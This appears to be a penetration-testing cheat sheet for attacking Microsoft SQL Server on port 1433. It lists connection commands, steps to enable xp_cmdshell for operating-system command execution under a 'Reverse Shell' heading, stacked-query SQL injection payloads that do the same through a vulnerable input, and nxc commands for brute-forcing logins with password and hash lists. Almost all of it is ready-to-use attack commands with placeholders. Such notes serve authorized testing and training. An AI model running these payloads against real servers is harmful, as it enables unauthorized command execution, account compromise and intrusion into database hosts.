TCP: MSSQL - 1433
Initial Connection
Connect on local machine
sqsh -S <Target IP Address> -U .\\<Username> -P <Password> -D <Database Name>
OR
impacket-mssqlclient [<Domain Name>/]<Username>:<Password>@<Target IP Address> -local-auth
Connect to machine
sqsh -S <Target IP Address> -U <Username> -P "<Password>"
OR
impacket-mssqlclient [<Domain Name>/]<Username>:<Password>@<Target IP Address> -windows-auth
Reverse Shell
On Machine
Initiate connection
If using sqsh, "GO" needs to be entered after every query to send it
Use the master databse
Use master
Get users that can run xp_cmdshell
EXEC sp_helprotect 'xp_cmdshell'
Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
Enable advanced options as it is needed for xp_cmdshell
sp_configure 'show advanced options', '1'
Apply changes
RECONFIGURE
Enable xp_cmdshell
sp_configure 'xp_cmdshell', '1'
Apply changes
RECONFIGURE
Run command
EXEC xp_cmdshell '<Command to execute>'
On SQLi vulnerability
Enable advanced options as it is needed for xp_cmdshell
'; EXEC sp_configure "show advanced options", 1; -- //
Apply changes
'; RECONFIGURE -- //
Enable xp_cmdshell
'; EXEC sp_configure "xp_cmdshell", 1; -- //
Apply changes
'; RECONFIGURE -- //
Run commands
'; EXEC xp_cmdshell "<Command to execute>"; -- //
Bruteforce
nxc mssql <Target IP Address> -d <Domain Name> -u <Username List> -p <Password List> --continue-on-success
nxc mssql <Target IP Address> -d <Domain Name> -u <Username List> -H <Hash List> --continue-on-success
Last updated